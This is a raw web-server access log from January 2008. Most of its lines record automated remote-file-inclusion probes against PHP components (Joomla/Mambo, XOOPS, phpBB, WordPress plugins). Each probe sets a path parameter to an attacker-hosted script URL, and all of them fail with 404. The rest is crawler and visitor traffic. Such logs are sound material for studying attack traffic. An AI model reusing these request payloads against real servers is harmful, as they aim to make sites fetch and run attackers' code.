86.109.165.93 - - [16/Jan/2008:04:02:43 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.114.83.67 - - [16/Jan/2008:04:11:29 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.114.83.67 - - [16/Jan/2008:04:11:29 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.114.83.67 - - [16/Jan/2008:04:11:29 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.114.83.67 - - [16/Jan/2008:04:11:46 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.114.83.67 - - [16/Jan/2008:04:11:46 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.114.83.67 - - [16/Jan/2008:04:11:46 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:04:12:32 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:04:12:33 -0800] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [16/Jan/2008:04:12:33 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.eurosong.be/chika/asc.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.242.108.82 - - [16/Jan/2008:04:12:55 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.buyphpscripts.com/x.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
193.242.108.82 - - [16/Jan/2008:04:12:56 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.buyphpscripts.com/x.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.114.83.67 - - [16/Jan/2008:04:13:14 -0800] "GET /logs/access_071230.log//tools/send_reminders.php?noSet=0&includedir=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.102.66 - - [16/Jan/2008:04:13:39 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
74.52.102.66 - - [16/Jan/2008:04:13:39 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
207.114.83.67 - - [16/Jan/2008:04:14:49 -0800] "GET /logs/access_071228.log//tools/send_reminders.php?noSet=0&includedir=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.247.217.43 - - [16/Jan/2008:04:15:15 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yeti/0.01 (nhn/1noon, yetibot@naver.com, check robots.txt daily and follow it)" "www.dmulk.com"
61.247.217.43 - - [16/Jan/2008:04:15:15 -0800] "GET / HTTP/1.1" 200 2962 "-" "Yeti/0.01 (nhn/1noon, yetibot@naver.com, check robots.txt daily and follow it)" "www.dmulk.com"
207.114.83.67 - - [16/Jan/2008:04:18:08 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.114.83.67 - - [16/Jan/2008:04:18:08 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.114.83.67 - - [16/Jan/2008:04:18:09 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.114.83.67 - - [16/Jan/2008:04:18:59 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [16/Jan/2008:04:21:15 -0800] "GET /logs/access_071228.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [16/Jan/2008:04:21:15 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [16/Jan/2008:04:21:44 -0800] "GET /logs/access_080101.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.114.83.67 - - [16/Jan/2008:04:22:14 -0800] "GET /logs/access_071228.log//tools/send_reminders.php?noSet=0&includedir=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.114.83.67 - - [16/Jan/2008:04:22:15 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.114.83.67 - - [16/Jan/2008:04:22:15 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
41.206.160.2 - - [16/Jan/2008:04:24:24 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
41.206.160.2 - - [16/Jan/2008:04:24:26 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
200.172.51.130 - - [16/Jan/2008:04:27:54 -0800] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.172.51.130 - - [16/Jan/2008:04:27:55 -0800] "GET /skin/zero_vote/error.php?dir=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.172.51.130 - - [16/Jan/2008:04:27:55 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.75.35.118 - - [16/Jan/2008:04:33:46 -0800] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://zal.sioru.net/KOMA/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [16/Jan/2008:04:33:46 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://zal.sioru.net/KOMA/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [16/Jan/2008:04:33:46 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://zal.sioru.net/KOMA/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [16/Jan/2008:04:34:46 -0800] "GET /logs/access_071228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://zal.sioru.net/KOMA/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.165.93 - - [16/Jan/2008:04:35:12 -0800] "GET /logs/access_071228.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [16/Jan/2008:04:35:13 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [16/Jan/2008:04:35:38 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.208.187.75 - - [16/Jan/2008:04:41:46 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?p=368285" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
74.6.28.223 - - [16/Jan/2008:04:43:28 -0800] "GET /bikes/CreSTOC07/?M=A HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.150.184.78 - - [16/Jan/2008:04:48:33 -0800] "GET /1000http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.26.19 - - [16/Jan/2008:04:49:53 -0800] "GET /?M=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.18.66 - - [16/Jan/2008:04:54:07 -0800] "GET /logs/access_071228.log/skin/zero_vote/setup.php?dir=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [16/Jan/2008:04:54:07 -0800] "GET /skin/zero_vote/setup.php?dir=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [16/Jan/2008:04:54:07 -0800] "GET /logs/skin/zero_vote/setup.php?dir=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
151.193.213.23 - - [16/Jan/2008:05:00:02 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?p=368163" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
67.19.18.66 - - [16/Jan/2008:05:02:49 -0800] "GET /logs/access_071228.log//xoops/modules/xfsection/modify.php?dir_module=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [16/Jan/2008:05:02:49 -0800] "GET //xoops/modules/xfsection/modify.php?dir_module=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [16/Jan/2008:05:02:50 -0800] "GET /logs//xoops/modules/xfsection/modify.php?dir_module=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.20 - - [16/Jan/2008:05:10:15 -0800] "GET /!scanhttp://www.articlesearchsite.com/backup/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.111.201.15 - - [16/Jan/2008:05:10:41 -0800] "GET /logs/access_071225.log//components/com_forum/download.php?phpbb_root_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.201.15 - - [16/Jan/2008:05:10:41 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.201.15 - - [16/Jan/2008:05:10:41 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.200 - - [16/Jan/2008:05:12:25 -0800] "GET /plans/?S=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.221.184.180 - - [16/Jan/2008:05:15:13 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://safetest.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
206.221.184.180 - - [16/Jan/2008:05:15:13 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://safetest.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
203.130.246.56 - - [16/Jan/2008:05:15:25 -0800] "GET /logs/access_080101.log//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.130.246.56 - - [16/Jan/2008:05:15:26 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.130.246.56 - - [16/Jan/2008:05:15:27 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.239.18 - - [16/Jan/2008:05:16:19 -0800] "GET /logs/skin/zero_vote/setup.php?dir=http://gay123456.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.86.239.18 - - [16/Jan/2008:05:16:19 -0800] "GET /skin/zero_vote/setup.php?dir=http://gay123456.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
216.246.77.206 - - [16/Jan/2008:05:16:58 -0800] "GET /logs/access_080101.log//components/com_forum/download.php?phpbb_root_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.206 - - [16/Jan/2008:05:16:58 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.206 - - [16/Jan/2008:05:17:01 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.24.186.87 - - [16/Jan/2008:05:19:27 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=ftp://200.27.59.22/.xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.24.186.87 - - [16/Jan/2008:05:19:30 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=ftp://200.27.59.22/.xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.24.186.87 - - [16/Jan/2008:05:19:33 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=ftp://200.27.59.22/.xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.208.66 - - [16/Jan/2008:05:21:58 -0800] "GET /include/scormExport.inc.php?includePath=http://theseoguide.com/administrator/templates/mambo_admin/css/boo.do?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
70.85.208.66 - - [16/Jan/2008:05:21:58 -0800] "GET /logs/include/scormExport.inc.php?includePath=http://theseoguide.com/administrator/templates/mambo_admin/css/boo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
203.131.209.130 - - [16/Jan/2008:05:24:22 -0800] "GET /logs/config.php?path_to_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.131.209.130 - - [16/Jan/2008:05:24:22 -0800] "GET /config.php?path_to_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.23.162 - - [16/Jan/2008:05:27:40 -0800] "GET /bikes/dteel/?D=A HTTP/1.0" 200 8385 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.25.144.137 - - [16/Jan/2008:05:31:38 -0800] "GET /logs/access_080101.log//components/com_forum/download.php?phpbb_root_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.144.137 - - [16/Jan/2008:05:31:44 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.144.137 - - [16/Jan/2008:05:31:49 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.146.2.196 - - [16/Jan/2008:05:33:24 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.146.2.196 - - [16/Jan/2008:05:33:24 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.146.2.196 - - [16/Jan/2008:05:33:24 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.26.42 - - [16/Jan/2008:05:35:39 -0800] "GET /bikes/dteel/?D=D HTTP/1.0" 200 8385 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.7.191.92 - - [16/Jan/2008:05:37:53 -0800] "GET /logs/access_080101.log//components/com_forum/download.php?phpbb_root_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.7.191.92 - - [16/Jan/2008:05:37:53 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.7.191.92 - - [16/Jan/2008:05:37:53 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.24.186.87 - - [16/Jan/2008:05:49:00 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=ftp://200.27.59.22/.xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.74.238 - - [16/Jan/2008:05:50:14 -0800] "GET /old_reports.php?file=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
82.194.74.238 - - [16/Jan/2008:05:50:15 -0800] "GET /logs/old_reports.php?file=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
74.6.26.118 - - [16/Jan/2008:05:50:19 -0800] "GET /funny/ HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
130.124.15.175 - - [16/Jan/2008:06:01:31 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
74.6.24.225 - - [16/Jan/2008:06:07:47 -0800] "GET /bikes/?D=A HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.10.155.237 - - [16/Jan/2008:06:09:27 -0800] "GET /logs/access_071231.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.155.237 - - [16/Jan/2008:06:09:27 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.155.237 - - [16/Jan/2008:06:09:27 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.lammer.altervista.org/php5/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.107 - - [16/Jan/2008:06:10:46 -0800] "GET /funny/?N=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.18.66 - - [16/Jan/2008:06:11:45 -0800] "GET /logs/access.log/skin/zero_vote/setup.php?dir=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.43.13.99 - - [16/Jan/2008:06:15:56 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kluna.info/mokon.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.43.13.99 - - [16/Jan/2008:06:15:57 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kluna.info/mokon.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.43.13.99 - - [16/Jan/2008:06:15:57 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kluna.info/mokon.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.22 - - [16/Jan/2008:06:30:52 -0800] "GET /minamijewelry/minami_site3.psd HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.13 - - [16/Jan/2008:06:31:11 -0800] "GET /bikes/?N=D HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.137 - - [16/Jan/2008:06:39:49 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.190.40.37 - - [16/Jan/2008:06:44:08 -0800] "GET /logs/access.log/modifyform.html?code=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.40.37 - - [16/Jan/2008:06:44:08 -0800] "GET /modifyform.html?code=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.40.37 - - [16/Jan/2008:06:44:09 -0800] "GET /logs/modifyform.html?code=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.40.37 - - [16/Jan/2008:06:44:38 -0800] "GET /logs/access_071225.log/modifyform.html?code=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.31.2 - - [16/Jan/2008:06:53:00 -0800] "GET /logs/access_080101.log//components/com_forum/download.php?phpbb_root_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.31.2 - - [16/Jan/2008:06:53:01 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.31.2 - - [16/Jan/2008:06:53:02 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.203.157 - - [16/Jan/2008:06:53:02 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.237.203.157 - - [16/Jan/2008:06:53:03 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.237.203.157 - - [16/Jan/2008:06:53:03 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
193.254.190.163 - - [16/Jan/2008:06:53:16 -0800] "GET /logs//xoops/modules/xfsection/modify.php?dir_module=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.146.2.196 - - [16/Jan/2008:06:53:41 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.146.2.196 - - [16/Jan/2008:06:53:41 -0800] "GET //components/minibb/index.php?absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.237.203.157 - - [16/Jan/2008:06:54:03 -0800] "GET /logs/access.log/convert/mvcw.php?step=1&vwar_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
213.52.230.10 - - [16/Jan/2008:07:03:01 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.alf-immobilien.de/cache/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.52.230.10 - - [16/Jan/2008:07:03:07 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.alf-immobilien.de/cache/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.52.230.10 - - [16/Jan/2008:07:03:07 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.alf-immobilien.de/cache/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.62.20.5 - - [16/Jan/2008:07:05:15 -0800] "GET /!scanhttp://www.geocities.com/dor_boom/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
